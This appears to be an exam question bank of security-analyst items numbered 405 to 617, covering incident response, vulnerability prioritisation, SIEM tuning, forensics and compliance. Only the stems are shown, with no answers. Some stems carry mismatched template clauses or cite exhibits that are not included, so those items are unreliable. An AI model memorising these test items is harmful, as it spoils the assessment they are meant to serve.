Hard405During the preparation phase of the NIST SP 800-61 incident response lifecycle, which of the following is the MOST important activity to ensure effective incident response?
Easy406Which compliance reporting requirement under GDPR mandates that organizations notify the relevant supervisory authority within a specific timeframe after becoming aware of a personal data breach?
Medium407Which of the following metrics measures the average time it takes to identify a security incident after it occurs?
Easy408A hospital's IT department has been receiving reports from nursing staff that the electronic medical record (EMR) system is responding slowly during peak hours. The network team has verified that the local area network is operating normally and there is no bandwidth congestion. The security analyst reviews the firewall logs and observes repeated outbound connections from the EMR server to an external IP address 198.51.100.23 on TCP port 443 at regular 5-minute intervals. Each connection transfers a small amount of data. The analyst also notes that the EMR server's antivirus software is up to date and no malware has been detected. The hospital's security policy requires that all outbound connections from critical servers be explicitly approved. Further investigation reveals that 198.51.100.23 is associated with a hosting provider in a foreign country. The analyst suspects a data exfiltration. Which of the following actions should the analyst take FIRST?
Hard409A security analyst is configuring a SIEM correlation rule to detect multiple failed login attempts followed by a successful login from the same source IP within a short time window. This pattern suggests a successful brute-force attack. Which of the following correlation types should the analyst use?
Medium410Your organization has deployed a new web application on a Linux server. The application uses a custom database port (TCP 3307). During a routine vulnerability scan, the scanner reports a critical vulnerability: 'MySQL Server - Unrestricted File Upload (CVE-20XX-XXXX)'. The system administrator confirms that MySQL is not installed; the custom database uses PostgreSQL on port 3307. The scanner likely misidentified the service due to port-based fingerprinting. On further investigation, you find that the scanner's fingerprinting database has an incorrect mapping for port 3307. The PostgreSQL version is current and fully patched. The environment is production and cannot be disrupted. Which of the following is the BEST action to take?
Hard411After containing a ransomware incident, the incident response team is conducting post-incident activities. Which action is MOST important to prevent a similar attack in the future?
Medium412A development team wants to find vulnerable open-source libraries before deployment. Which control best fits this stage? For control selection, Which control best addresses the stated weakness without hiding risk?
Hard413A scanner flags TLS 1.0 on a server, but the service owner says TLS 1.0 is disabled. What is the BEST validation method? For tool configuration, Which scanner or pipeline change most directly improves result quality?
Hard414A security analyst is evaluating a Kubernetes cluster for misconfigurations. Which TWO of the following are common Kubernetes misconfigurations that increase security risk? (Select the two best answers.)
Medium415A company uses a configuration management tool to enforce CIS Benchmarks on its servers. The security team wants to apply Level 1 benchmarks to all servers to achieve a baseline security posture. Which of the following best describes the difference between CIS Level 1 and Level 2 benchmarks?
Medium416During a traffic analysis, a security analyst observes repeated outbound connections from an internal workstation to an external IP address on TCP port 53 at irregular intervals. The connections are small and occur every few minutes. Which technique is most likely being used?
Medium417A CASB alert indicates that a user downloaded a file containing sensitive data from a cloud app to an unmanaged device. Which action should the analyst take first?
Medium418A security dashboard is being designed for the executive team. Which metric is MOST appropriate to display?
Easy419During a web application security assessment using OWASP ZAP, a tester identifies that the application reflects user input in HTTP responses without proper encoding. Which OWASP Top 10 vulnerability category does this finding most likely belong to?
Medium420When briefing legal and privacy teams after a suspected data exposure, which details matter? (Choose two.)
Medium421A security analyst is reviewing alerts from an IDS. Which TWO indicators are most likely to suggest a successful command and control (C2) communication? (Choose two.)
Easy422An organization is implementing a patch management process for servers. Which of the following is a crucial step that should be performed before deploying patches to production servers?
Medium423During a security incident involving a potential data breach, the CISO asks you to prepare a communication for the board of directors. What is the MOST important aspect to emphasize in this communication?
Medium424During a forensic investigation, an analyst must preserve evidence in accordance with forensic sound procedures. Which THREE of the following practices should the analyst follow? (Select THREE.)
Hard425A security analyst receives an alert about a possible ransomware outbreak. Which short-term containment action should be performed FIRST to prevent further spread?
Easy426A company's IDS generated an alert for a SQL injection attempt against a web server. The web application firewall (WAF) is already in place. What is the best action?
Easy427A cloud posture scan finds a storage bucket with public read access containing customer exports. What should the team do first? For tool configuration, Which scanner or pipeline change most directly improves result quality?
Medium428Which evidence helps distinguish a true brute-force attack from a misconfigured service account? (Choose two.)
Medium429Which three metrics are commonly used to measure the effectiveness of a security operations center (SOC)? (Select THREE.)
Medium430Which TWO of the following are indicators of potential data exfiltration via DNS?
Hard431In a regulated payment environment, an incident was contained successfully, but delayed escalation allowed the attacker more dwell time. What should the post-incident review produce? During eradication, which decision is most defensible? which action best reduces risk without losing evidence?
Easy432During the detection and analysis phase of incident response, a security analyst identifies suspicious outbound traffic from a finance workstation to a known malicious IP address at 2:00 AM. The analyst checks the firewall logs and sees a single connection. Which action should the analyst take FIRST according to NIST SP 800-61?
Medium433An organization's compliance dashboard shows a control effectiveness score of 85%. Which type of evidence best supports this score?
Hard434A security analyst receives an alert from the HIDS indicating that a critical configuration file was modified unexpectedly. What is the best immediate action?
Medium435A security analyst is reviewing a SIEM alert that triggered on a single failed login attempt from an internal IP address to a domain controller at 3:00 AM. The user associated with the account is on vacation. Which classification best describes this alert?
Easy436During a threat hunting exercise, an analyst formulates a hypothesis that an attacker may be using DNS tunneling to exfiltrate data. Which data source would provide the best evidence to confirm or deny this hypothesis?
Hard437A security analyst is triaging an alert indicating that a user's workstation has been infected with ransomware. The file server shows signs of encryption. The analyst needs to contain the incident. Which action should the analyst take FIRST to minimize damage?
Medium438Which signals strengthen an alert for Kerberoasting activity? (Choose two.)
Hard439A laptop may contain evidence for a legal investigation. What should the responder document during acquisition? During post-incident improvement, which decision is most defensible?
Hard440An incident responder is called to a server room where a critical database server is exhibiting signs of compromise. The responder must preserve evidence while preventing further damage. Which of the following is a short-term containment strategy that also preserves evidence?
Medium441A DAST scan cannot reach authenticated pages of a web application and reports only public content findings. What should be configured? For tool configuration, Which scanner or pipeline change most directly improves result quality?
Easy442Which of the following is the BEST description of configuration drift?
Easy443A security analyst is reviewing vulnerability scan results and notices that several critical vulnerabilities have been reported on the same web server for three consecutive months. The server owner states that the patches cannot be applied due to application compatibility issues. Which of the following is the BEST course of action?
Easy444During dynamic malware analysis in a sandbox, an analyst observes that the malware attempts to connect to a remote IP address on port 443, modifies the Windows registry under HKCU\Software\Microsoft\Windows\CurrentVersion\Run, and drops a DLL in the system32 folder. Which type of IOC is most indicative of persistence?
Medium445A security analyst is configuring a vulnerability scanner for a new deployment. The scanner must be able to authenticate to targets to perform deep configuration audits against CIS Benchmarks. Which type of scan should the analyst configure?
Medium446An incident report includes a section that details the sequence of events from initial compromise to containment. Which component of the incident report does this describe?
Medium447A large e-commerce site is under a DDoS attack targeting its web servers. The incident response team is activated. Which goal should receive the HIGHEST priority during the response?
Hard448During a patch management process, a security analyst is testing a critical security patch in a staging environment. The patch causes a regression in a key business application. Which of the following should the analyst do next?
Medium449Based on the scan output, which vulnerability should be prioritized first for remediation?
Hard450Which of the following tools is specifically designed for compliance scanning against security benchmarks such as CIS and STIG?
Easy451Which THREE activities are typically performed during the post-incident activity phase of the incident response lifecycle?
Hard452During memory analysis of a compromised host, an analyst finds a process that appears to be 'svchost.exe' but with an unusual parent process (not 'services.exe'). The process also has injected code in its memory. What is the most likely explanation?
Hard453A security analyst needs to communicate the findings of a penetration test to the IT operations team and the CISO. Which three of the following actions best support effective reporting and communication? (Choose three.)
Medium454A SIEM alert shows one workstation requesting a high number of Kerberos service tickets for many SPNs, followed by no corresponding service access. Which attack should be suspected?
Hard455A cloud tenant shows an unusual spike in IAM policy changes, access key creation, and failed console logons from a new country. Which telemetry set gives the strongest evidence for control-plane compromise? In the alert triage phase, Which action gives the analyst the clearest next triage step?
Hard456Order the steps for deploying a new security patch to a production environment.
Medium457During a forensic investigation, an analyst creates a disk image using dd with a SHA256 hash. Later, the analyst needs to verify the integrity of the image before analysis. Which command should the analyst use to compare the original hash with a newly computed hash?
Medium458A cloud security analyst reviews AWS CloudTrail logs and notices multiple 'RunInstances' API calls from a single IAM user creating EC2 instances with public IP addresses in an unusual region. What is the most likely concern?
Medium459Which of the following is the primary audience for a strategic threat intelligence report?
Easy460A vulnerability scan report shows a critical vulnerability on a web server with a CVSS score of 9.8. The IT manager wants to know the risk to the organization. Which of the following factors should the analyst consider FIRST?
Easy461A vulnerability management analyst is reviewing the results of an authenticated scan. The analyst identifies several medium-severity vulnerabilities that have been present for over a year. Which of the following are the best actions to take? (Choose two.)
Medium462An organization uses a SIEM with a rule that triggers when a user fails to authenticate five times within 10 minutes. Last night, the rule fired for a service account from an internal IP. What should be the first triage step?
Hard463Which of the following best describes the purpose of the CISA Known Exploited Vulnerabilities (KEV) catalog in vulnerability management?
Easy464A security analyst discovers a critical vulnerability in a web application that allows an attacker to trigger server-side requests from the application server. Which OWASP Top 10 category does this vulnerability belong to?
Hard465What is the net effect of the policy shown in the exhibit on requests from an IP address in the 10.0.0.0/8 range?
Hard466An organization is preparing for an audit to demonstrate compliance with GDPR. The compliance officer needs to provide evidence of data protection controls. Which of the following would be the BEST evidence to include?
Medium467A SOC analyst notices a spike in outbound traffic from a server that normally only serves web pages. The signature-based IDS did not alert. What should the analyst do next?
Hard468An analyst is preparing a vulnerability report for management. Which THREE sections should be included to effectively communicate findings and remediation? (Select THREE.)
Medium469A container workload unexpectedly starts a shell, mounts the host filesystem, and attempts outbound connections to an unknown IP. Which telemetry is MOST useful? In the evidence source phase, Which evidence source best supports or refutes the detection?
Hard470An analyst reviews AWS CloudTrail logs and detects multiple 'CreateNetworkAclEntry' API calls from a user who does not typically perform network administration. What type of activity is this?
Medium471An organization has been experiencing repeated phishing attacks that bypass email filters. The incident response team wants to enhance detection by creating rules based on characteristics of the phishing emails. Which of the following IOCs would be most effective for detecting similar phishing campaigns?
Medium472A security analyst is tasked with performing a risk assessment for a new web application. The application will handle sensitive customer data. Which of the following should the analyst do FIRST to identify vulnerabilities specific to the application?
Hard473An analyst is creating a compliance dashboard for management. Which of the following is the most relevant metric to include regarding patch management?
Medium474A security analyst is reviewing IOCs from a threat intelligence feed. The analyst wants to enrich the IOCs using open-source tools. Which THREE tools are commonly used for IOC enrichment? (Select three.)
Easy475Which items help make a post-incident report useful for technical teams? (Choose two.)
Medium476An organization is experiencing a DDoS attack targeting its web servers. Which of the following is the BEST short-term containment strategy?
Medium477During forensic analysis of a compromised server, the analyst finds that the attacker deleted the system logs. Which data source is most likely to still contain relevant evidence?
Hard478An analyst is creating a YARA rule to detect a specific malware family that uses the string 'evil' in its PE file. Which of the following rule structures is correct?
Medium479A security team is tuning a SIEM rule that alerts on all outbound connections to IP addresses classified as 'high risk' by threat intelligence. The rule generates many false positives because some legitimate services use these IPs. Which two actions should the analyst take to reduce false positives? (Select TWO.)
Medium480A security analyst is drafting a communication plan for a suspected data breach involving customer personally identifiable information. Legal counsel advises that notification may be required under multiple regulations. Which of the following should the analyst do FIRST to ensure the communication plan meets regulatory obligations?
Easy481A security analyst is using Qualys to perform a vulnerability scan on a public-facing web server. The scan results show that the server is running an outdated version of Apache HTTP Server with multiple known vulnerabilities. The analyst checks the vendor security advisories and finds that a patch was released three months ago. However, the server is in a staging environment and not yet in production. What should the analyst recommend?
Medium482A medium-sized company has experienced a ransomware attack that encrypted critical file servers. The incident response team has contained the outbreak and restored data from backups. The CISO has requested a post-incident report. The report must include a timeline, root cause analysis, lessons learned, and recommendations. The security team is currently overwhelmed with recovery tasks. The CISO wants the report delivered in 24 hours. Which of the following is the BEST course of action for the security analyst assigned to write the report?
Easy483A vulnerability scanner reports a finding with a CVSS v3.1 base score of 7.5 and vector AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H. What does this indicate about the vulnerability?
Medium484A security team is responding to a phishing incident that led to credential compromise. Which of the following is the BEST short-term containment action to prevent further damage?
Medium485Which of the following is a key component of a vulnerability report that provides a high-level overview for management?
Medium486During a threat hunting exercise, the hunter creates a hypothesis based on recent threat intelligence about a new ransomware variant that uses scheduled tasks for persistence. Which ATT&CK technique should the hunter focus on?
Medium487A security analyst is using Burp Suite to test an API endpoint. The analyst notices that the API returns detailed error messages when invalid input is provided, revealing database schema information. Which OWASP Top 10 category does this issue primarily relate to?
Medium488During a penetration test, a tester successfully exploits a vulnerability in a web application and gains a shell on the backend server. The tester then attempts to pivot to other hosts. Which of the following security controls would be most effective in limiting lateral movement in this scenario?
Hard489An analyst suspects a process hollowing attack on an endpoint. Which of the following EDR telemetry findings would best support this hypothesis?
Hard490A company uses a cloud-based identity provider (IdP) for single sign-on (SSO) to all applications. The SOC receives an alert that a user's account logged in from an IP address associated with a country where the company has no offices. The user is currently on a planned vacation and is not in that country. The analyst reviews the authentication logs and sees the login used a valid token and correct multi-factor authentication (MFA) method. Which of the following is the BEST initial step to handle this alert?
Easy491A security analyst is using a vulnerability scanner to identify missing patches on Windows servers. The scanner uses plugins that reference Common Vulnerabilities and Exposures (CVE) identifiers. Which THREE of the following are components of a CVSS v3.1 base score vector?
Easy492A security analyst is preparing a monthly dashboard for the board of directors. Which metric would best demonstrate the effectiveness of the security program in reducing risk?
Easy493During an incident response, the SOC team identifies a data breach involving customer PII. Under GDPR, what is the maximum time frame to notify the supervisory authority?
Medium494A security analyst is investigating a potential advanced persistent threat (APT) that uses living off the land binaries (LOLBins). The EDR has flagged several processes. Which THREE process behaviors are most indicative of LOLBin abuse? (Choose THREE.)
Hard495A security analyst is conducting a vulnerability assessment of a web application. The assessment reveals that the application is vulnerable to SQL injection. Which of the following is the MOST effective remediation?
Easy496Match each regulatory framework to its focus.
Medium497A user receives repeated MFA prompts and eventually approves one they did not initiate. Which behaviour should the analyst classify this as?
Medium498An organization uses OpenSCAP to perform compliance scanning against STIGs for DoD environments. A scan reveals that several systems are non-compliant with STIG ID: V-XXXXX requiring 'The system must disable the guest account.' The configuration drift detection tool shows that the guest account was re-enabled after a recent patch. What is the MOST effective course of action?
Hard499An incident responder is performing containment of a ransomware incident that has encrypted files on several file servers. Which THREE actions are appropriate for long-term containment and recovery? (Select THREE)
Medium500A SIEM correlation rule for impossible travel is creating noise from VPN users. Which refinements should improve fidelity? (Choose two.)
Hard501An organization is implementing a patch management process and wants to track compliance. They deploy patches to a test group of systems before rolling out to the entire environment. After patching the test group, they run a vulnerability scan and find that 95% of the vulnerabilities are resolved. What should the organization do next?
Medium502A security team discovers a critical vulnerability in a widely used software component. The vulnerability has a CVSS score of 9.0, but there is no known exploit or patch available yet. However, the software vendor has released a workaround. According to the vulnerability management lifecycle, which action should the team prioritize first?
Hard503A security analyst is prioritizing vulnerabilities from a scan. Which TWO factors should be considered to determine the remediation priority? (Select TWO)
Hard504Which findings should be included when reporting remediation performance to asset owners? (Choose two.)
Medium505An organization is implementing security hardening for Kubernetes clusters. Which THREE of the following are common Kubernetes misconfigurations that should be addressed? (Select THREE)
Medium506During a threat hunting engagement, an analyst creates a hypothesis based on a recent threat intelligence report about a new APT group using DLL side-loading for persistence. The analyst decides to search for processes that have loaded a known vulnerable DLL. Which framework is most appropriate to map the TTPs?
Hard507A security team is implementing container security scanning in their CI/CD pipeline. They want to scan container images for vulnerabilities and Kubernetes misconfigurations. Which THREE tools from the following list are best suited for this purpose? (Select THREE)
Hard508An analyst is investigating a suspected data exfiltration via HTTP. The analyst examines a PCAP file and finds a series of HTTP POST requests to an external site with varying 'Content-Length' values. The payloads appear to be base64-encoded strings. Which tool would be most effective for extracting and decoding the payloads for analysis?
Hard509During a memory analysis of a potentially compromised host, a security analyst finds a process with an executable image that is not present on disk. Which technique is most likely being observed?
Medium510An analyst is investigating a suspected data breach. The analyst needs to identify which files were exfiltrated and preserve evidence. According to the order of volatility, which of the following should the analyst capture FIRST?
Medium511A legal hold is issued during an investigation. Which actions support it? (Choose two.)
Hard512A security analyst is creating a Sigma rule to detect suspicious usage of 'schtasks.exe' to create a scheduled task that runs an encoded PowerShell command. Which log source is most appropriate for this rule?
Medium513A security analyst is performing an API vulnerability test using OWASP ZAP. The analyst finds several issues. Which THREE of the following are common API vulnerabilities according to OWASP? (Select THREE.)
Hard514A server team needs to fix an OpenSSL vulnerability across Linux hosts. What should the technical remediation section include? If the primary audience is technical remediation owner, which content choice is most appropriate?
Medium515A security analyst is reviewing a SIEM alert indicating a high number of failed authentication attempts from a single IP address against multiple user accounts. The analyst checks the logs and finds the IP belongs to a known vulnerability scanner used by the internal security team. How should the analyst classify this alert?
Medium516During a security incident, the SOC team identifies indicators of compromise (IoCs) related to a new malware strain. Which type of threat intelligence report should be produced for the SOC team to enhance detection?
Medium517A vulnerability management team has identified a critical vulnerability with a CVSS score of 9.8. The vulnerability affects a public-facing web server that handles sensitive customer data. The team decides to apply a patch immediately without going through the normal patch testing cycle. What type of patching procedure is this?
Medium518A security analyst is prioritizing vulnerabilities for remediation. The analyst has the following information: a vulnerability with a CVSS score of 9.0 that affects a public-facing web server, and a vulnerability with a CVSS score of 7.5 that affects an internal database server with sensitive data. Which two factors should the analyst consider when prioritizing? (Choose two.)
Hard519During a security incident, the SOC analyst determines that the attack is originating from an internal IP address belonging to the finance department. The incident response plan requires escalation to the appropriate team. Which of the following should the analyst contact first?
Medium520Which items belong in a vulnerability exception request? (Choose three.)
Medium521An analyst needs to collect evidence for a compliance audit. Which type of evidence is most appropriate to demonstrate that access reviews are performed regularly?
Medium522A security team uses the Common Vulnerability Scoring System (CVSS) v3.1 to prioritize vulnerabilities. They find a vulnerability with a base score of 7.5 and vector AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H. However, the asset is a public-facing web server with no backups. The team also checks the Exploit Prediction Scoring System (EPSS) and sees a score of 0.95 (95% probability of exploitation in the next 30 days). Which action should the team take first based on prioritizing by risk?
Hard523During the detection and analysis phase of incident response, a security analyst identifies suspicious outbound traffic from a workstation to an external IP address known for command and control (C2) activity. Which classification should the analyst assign to this incident?
Medium524During a security incident, a SOC analyst identifies that customer PII has been exfiltrated. The company operates in multiple states and processes EU residents' data. Which of the following is the MOST critical immediate communication requirement?
Hard525An incident responder is classifying an incident. The incident involves ransomware encrypting files on multiple workstations, causing significant business disruption. Which severity level should be assigned to this incident?
Easy526A legacy system cannot be patched because the vendor no longer supports the application. What should the vulnerability manager request? For validation, Which action should be taken before closing or downgrading the finding?
Medium527A vulnerability scan report shows a critical vulnerability with a CVSS score of 10.0. The application team states that the affected service is isolated in a DMZ and has no access to sensitive data. What should the analyst consider?
Easy528A security analyst is preparing a quarterly vulnerability management report for IT operations managers. The report must help them prioritize remediation efforts across a large environment. Which metric is MOST useful to include for this audience?
Medium529A vulnerability management analyst is reviewing scan results from a recent Nessus scan. The analyst notices a plugin with the output: 'The remote host is missing a security patch for CVE-2023-1234. The patch was released by the vendor on 2023-05-01.' Which phase of the vulnerability lifecycle is the analyst currently performing?
Medium530A cloud posture scan finds a storage bucket with public read access containing customer exports. What should the team do first? For business prioritization, Which recommendation gives the best risk-based order of work?
Medium531A security analyst is reviewing a DAST report from Burp Suite for a web application. The report indicates a potential Server-Side Request Forgery (SSRF) vulnerability in a feature that fetches URLs. Which of the following is the most effective mitigation?
Medium532A security analyst is investigating a potential insider threat where a user is suspected of exfiltrating sensitive data via USB drives. The analyst needs to gather evidence while preserving the chain of custody. Which THREE actions should the analyst perform? (Choose THREE.)
Hard533During a vulnerability assessment, a security analyst discovers a critical vulnerability affecting a legacy application that cannot be patched due to vendor end-of-life status. Which of the following is the BEST next step?
Medium534An analyst is reviewing a suspicious executable using static analysis. Which of the following would provide information about the functions the executable imports from system libraries?
Medium535A security analyst is reviewing a vulnerability scan report and sees a finding for a web application with a CVSS v3.1 base score of 6.1. The vector string is AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N. Which OWASP Top 10 category does this vulnerability most likely belong to?
Medium536A vulnerability management team is prioritizing remediation of several vulnerabilities. They have access to EPSS scores and the CISA KEV catalog. Which factor should they consider FIRST when deciding which vulnerability to remediate?
Medium537A security analyst receives an alert that a workstation is communicating with a known C2 server over DNS. The analyst wants to quickly isolate the endpoint from the network but keep it powered on for later memory capture. Which of the following actions should the analyst take FIRST?
Medium538During a post-incident review, the team identifies that detection was delayed because alerts from multiple sources were not correlated. Which improvement would BEST address this issue?
Hard539An organization uses OpenSCAP to perform compliance scanning. The scan results indicate that a system fails to meet a STIG requirement. Which of the following best describes the purpose of STIGs?
Medium540During a ransomware attack, several workstations have been encrypted. The incident response team has identified the ransomware variant and determined it does not have a known decryption tool. Which containment strategy is MOST appropriate?
Medium541A security analyst is reviewing a vulnerability scan report and sees a plugin with a CVSS v3.1 base score of 7.5. The attack vector is 'Network', attack complexity is 'Low', privileges required is 'None', user interaction is 'None', scope is 'Unchanged', and the confidentiality impact is 'High', but integrity and availability impacts are 'None'. This vulnerability is best described as:
Easy542A security analyst receives a threat intelligence report containing detailed Indicators of Compromise (IoCs) such as IP addresses, file hashes, and domain names. What is the MOST appropriate audience for distributing this type of report?
Medium543A security analyst is creating a correlation rule in the SIEM to detect DGA (Domain Generation Algorithm) activity. Which of the following data points would be most useful to include in the rule?
Medium544Match each security control to its category.
Medium545A security analyst needs to provide threat intelligence to different audiences. Which TWO of the following are appropriate dissemination approaches?
Medium546An analyst is preparing a report that includes Personally Identifiable Information (PII) from a data breach. The report will be shared with external auditors. Which of the following is the BEST practice for handling PII in the report?
Hard547A security analyst is prioritizing vulnerabilities for remediation. Which TWO factors should be considered HIGHEST when determining prioritization? (Choose two.)
Medium548An analyst is performing static analysis on a suspicious executable. The analyst discovers that the PE file has a suspicious section name and a high entropy value. Which tool or technique would be MOST useful for further analyzing the packed nature of the file?
Hard549Which analysis technique involves examining the parent-child relationships of processes to identify potentially malicious activity?
Easy550A SOC analyst receives an alert from a threat intelligence platform (TIP) about a new phishing campaign. The indicator is a URL. Which enrichment source is BEST for determining the URL's current hosting infrastructure?
Hard551Refer to the exhibit. A security analyst is reviewing SIEM logs and notices repeated entries from the same source IP. Which of the following actions should the analyst take NEXT?
Medium552A security analyst is performing a web application security assessment and identifies a potential cross-site scripting (XSS) vulnerability. The application is critical to business operations. Which TWO of the following are appropriate immediate actions?
Medium553A new cloud log source is onboarded, but analytics fail because source IP, user, and action fields are mapped inconsistently. What should the engineer fix?
Hard554Arrange the steps for a typical digital forensics investigation process.
Medium555An incident response team is conducting post-incident activities after containing a malware outbreak. Which TWO activities should be included in the lessons learned phase? (Choose TWO.)
Easy556Which TWO of the following are essential steps in the incident response phase of 'Containment, Eradication, and Recovery'? (Choose two.)
Medium557A security analyst is reviewing vulnerability scan results and sees a critical vulnerability on a web server with a CVSS score of 9.8. The server is a legacy system that cannot be patched without causing application downtime. The business requires the application to remain available. Which of the following is the BEST course of action?
Easy558A security analyst needs to report a critical vulnerability to the executive team. The report should balance technical details with business impact. Which of the following is the BEST approach?
Medium559A vulnerability report for a critical application shows that a high-risk vulnerability has been accepted by the business owner. What should the analyst include in the report to document this decision?
Medium560A vulnerability assessment has identified multiple issues. Which THREE actions are appropriate steps in the remediation process? (Choose three.)
Hard561An incident response team is analyzing indicators of compromise (IOCs) from a phishing campaign. Which THREE of the following are commonly used IOC types? (Select THREE.)
Easy562Which of the following vulnerability scanning tools is open source and commonly used for network vulnerability assessment?
Easy563A security analyst at a financial institution is responsible for vulnerability management. The company has a policy that all critical vulnerabilities must be remediated within 72 hours. The weekly vulnerability scan identifies a critical vulnerability on a file server that hosts sensitive customer data. The vulnerability is a remote code execution in the operating system. The server is running a legacy OS that is no longer supported by the vendor. The system owner states that the application on the server cannot be migrated to a newer OS for at least six months. The server cannot be taken offline because it is used by the compliance team for daily audits. Which of the following should the analyst recommend to best address the risk?
Medium564An analyst needs to identify which process on a Windows system is making outbound connections to the internet. Which tool should be used?
Easy565Which of the following is a key performance indicator (KPI) for measuring the efficiency of patch management?
Easy566Which TWO of the following are best practices for secure log management? (Choose TWO)
Easy567A security analyst is using OpenVAS to perform a vulnerability scan of an internal network. The scan completes and generates a report listing several vulnerabilities. What is the next step in the vulnerability lifecycle?
Easy568Which TWO of the following are key phases of the incident response process as defined by NIST?
Medium569A scan of Windows servers reports few findings, but the scanner used no credentials. The security manager suspects missing patch data. What should be changed? For control selection, Which control best addresses the stated weakness without hiding risk?
Medium570A security analyst is reviewing SIEM alerts and sees multiple failed logon events from a single external IP address across several user accounts within two minutes. The source IP is from a known malicious geolocation. What type of attack is most likely occurring?
Hard571A company policy requires that all security incidents be reported to management within one hour of detection. An analyst discovers a low-severity incident (a single malware download attempt blocked by antivirus) at 4:55 PM on a Friday. The analyst is about to leave for the weekend. What should the analyst do?
Hard572A security analyst needs to communicate the business impact of a newly discovered critical vulnerability to the executive team. Which of the following is the BEST approach?
Easy573Arrange the steps for a typical penetration testing engagement in the correct order.
Medium574A security analyst is analyzing a suspicious file using static analysis. The analyst wants to identify imported functions to determine the file's capabilities. Which tool or technique is BEST suited for this task?
Easy575During an incident, the SOC team identifies indicators of compromise (IoCs) that may affect partners. According to best practices, what should the analyst do first?
Hard576An analyst examines a memory dump from a compromised host and finds that 'svchost.exe' is executing code from a memory region that is not backed by any executable file. What technique is most likely being used?
Hard577A threat hunter suspects data exfiltration over HTTPS from a database server. Which data sources are most useful? (Choose two.)
Hard578During a vulnerability scan of an internal web server, the scanner reports a critical vulnerability with a CVSS score of 9.8. The analyst reviews the finding and determines that the vulnerability is mitigated by a Web Application Firewall (WAF) deployed in front of the server. What should the analyst do with this finding?
Easy579A Security Operations Center (SOC) analyst is tuning a SIEM rule to reduce false positives. Which three of the following are valid approaches to improve the signal-to-noise ratio of a detection rule? (Choose three.)
Medium580A vulnerability scanner reports that an internal web application is vulnerable to SQL injection. The development team says they fixed it by input sanitization. Which of the following should the analyst do FIRST?
Medium581A CI pipeline blocks a container image because the base layer contains a critical OpenSSL CVE. The application team says the vulnerable binary is not used. What is the BEST next step? For validation, Which action should be taken before closing or downgrading the finding?
Easy582During a forensic analysis, an analyst needs to collect data in order of volatility. Which of the following represents the correct order from most volatile to least volatile?
Medium583During a network traffic analysis, a security analyst observes repeated TCP SYN packets sent to a host that responds with SYN-ACK, but the connection never completes. What type of anomaly is this?
Medium584During the post-incident analysis phase of an incident response process, which of the following activities are considered essential best practices? Choose all that apply. (There are four correct answers.)
Medium585An emergency patch may break a revenue-critical system. Which actions balance risk and availability? (Choose two.)
Hard586A security analyst is reviewing logs from multiple sources to investigate a potential intrusion. Which log source would provide the most reliable evidence of successful authentication from an unusual location?
Easy587Match each incident response phase to its activity.
Medium588A security analyst is investigating a potential data exfiltration incident. The analyst observes the following network traffic from an internal host: Outbound connections to an external IP on port 22, large data transfers during off-hours, and the use of SCP. Which two indicators of compromise (IOCs) are most relevant? (Select TWO.)
Medium589During forensic acquisition, which of the following types of data is considered the MOST volatile?
Medium590During an incident response, the team identifies that a workstation was compromised via a phishing email. Which of the following should be performed immediately after containment?
Easy591A security analyst is performing forensic analysis of a compromised system. The analyst needs to acquire disk evidence in a forensically sound manner. Which TWO actions should the analyst take to ensure the integrity of the evidence? (Choose TWO.)
Medium592A vulnerability manager wants accurate Linux package findings. Which scan conditions are important? (Choose two.)
Medium593Based on the exhibit, which type of issue is most likely affecting the server's network performance?
Medium594Match each network protocol to its well-known port number.
Medium595Which metric in the CVSS v3.1 base score indicates the level of access an attacker needs to exploit a vulnerability?
Easy596A security analyst discovers a server that is missing multiple critical patches. The server hosts a legacy application that cannot be patched immediately due to compatibility issues. Which of the following is the BEST approach to manage the vulnerability risk?
Medium597Arrange the steps for conducting a risk assessment in the correct order.
Medium598A security analyst notices that an IDS is generating a high number of false positives for legitimate encrypted traffic. Which tuning method should the analyst use to reduce false positives without reducing detection capability?
Medium599A security analyst is preparing a vulnerability report for the IT operations team. Which section should provide a high-level overview of the organization's risk posture?
Medium600An organization wants to automate the sharing of threat intelligence with other trusted entities using a standardized protocol. Which protocol is specifically designed for this purpose?
Easy601A security analyst is performing memory acquisition on a compromised Linux server using LiME. The analyst needs to capture the memory image with minimal impact on the system. Which of the following parameters should the analyst use to ensure the output is forensically sound?
Hard602A security team is implementing a patch management process for a large enterprise. They must ensure that patches are tested before deployment to production. The team has a staging environment that mirrors production. During patch testing, they discover that a critical security patch for a database server causes a performance degradation of 30% in a key application. What should the team do next?
Hard603Which THREE of the following are essential tools and technologies used in a Security Operations Center (SOC) for monitoring and detection?
Medium604An organization is experiencing a distributed denial-of-service (DDoS) attack targeting its web servers. The incident response team is implementing containment strategies. Which TWO actions are appropriate for short-term containment of a DDoS attack? (Choose TWO.)
Medium605During a forensic investigation, an analyst finds a suspicious registry key that runs a program at startup. What is the best way to determine if the program is malicious?
Hard606A security analyst is reviewing NetFlow data and notices a significant amount of traffic from an internal host to a known malicious IP address on port 443. What tool would be most effective for further analyzing the payload of this traffic?
Easy607What should be included in incident scoping for ransomware? (Choose three.)
Medium608Which of the following is the primary purpose of log normalisation in a SIEM?
Easy609A security analyst uses Wireshark to capture traffic and notices an unusually high number of DNS queries for random-looking subdomains under a single domain, such as 'a1b2c3.malicious.com'. The TTL values are very low. The analyst suspects DNS tunneling. Which of the following additional indicators would most strongly support this hypothesis?
Hard610Match each attack type to its description.
Medium611An organization has identified a ransomware outbreak on several workstations. Which TWO actions should the incident response team take immediately?
Hard612A scan of Windows servers reports few findings, but the scanner used no credentials. The security manager suspects missing patch data. What should be changed? For tool configuration, Which scanner or pipeline change most directly improves result quality?
Medium613Which three of the following are effective techniques for prioritizing vulnerabilities for remediation in a vulnerability management program? (Choose three.)
Medium614A security analyst is investigating a containerized environment. A scan using Trivy has identified a critical vulnerability in a container image. The container is running in a Kubernetes cluster with a Pod Security Policy that disallows privileged containers. Which additional concern should the analyst address?
Hard615A vulnerability management analyst is prioritizing vulnerabilities for remediation. The analyst has the following information for three vulnerabilities: CVE-2023-1: CVSS 9.8, EPSS 0.9, asset criticality high; CVE-2023-2: CVSS 7.5, EPSS 0.01, asset criticality low; CVE-2023-3: CVSS 5.0, EPSS 0.8, asset criticality medium. According to best practices, which THREE factors should the analyst consider when prioritizing? (Select THREE)
Hard616A legacy system cannot be patched because the vendor no longer supports the application. What should the vulnerability manager request? For control selection, Which control best addresses the stated weakness without hiding risk?
Medium617A SOC team is tuning a SIEM to reduce false positives. Which THREE of the following metrics should the team consider when evaluating detection effectiveness? (Choose THREE)
